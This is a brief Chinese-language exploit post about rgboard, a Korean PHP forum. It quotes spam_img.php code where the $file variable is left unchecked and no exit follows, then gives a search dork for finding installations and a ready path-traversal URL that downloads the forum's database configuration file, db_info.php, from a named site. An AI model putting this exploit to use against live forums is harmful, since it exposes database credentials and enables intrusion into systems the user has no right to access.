rgboard是韩国的一款php论坛

这是一个标准的逻辑漏洞

spam_img.php代码如下
$schk_code = $_SESSION["schk_".$chk_code];
    if(preg_match('/^[0-9]/',$schk_code[$ord])) { // ????
        $file='images_spam/'.$schk_code[$ord].".gif";
    } else if(preg_match('/^[a-z]/',$schk_code[$ord])) { // ??????
        $file='images_spam/'.$schk_code[$ord]."1.gif";
    } else if(preg_match('/^[A-Z]/',$schk_code[$ord])) { // ??????
        $file='images_spam/'.$schk_code[$ord]."2.gif";
    }

  //没有exit

    header ("Cache-Control: no-cache, must-revalidate");
    header ("Pragma: no-cache");
    $LastModified = gmdate("D d M Y H:i:s", time());
    header("Last-Modified: $LastModified GMT");
    header("ETag: \"$LastModified\"");
        
    download_file($file,'-','application/octet-stream');

利用很简单：
inurl:rg4_board

http://www.luoyes.com/rg4_board/spam_img.php?file=../rg4_data/db_info.php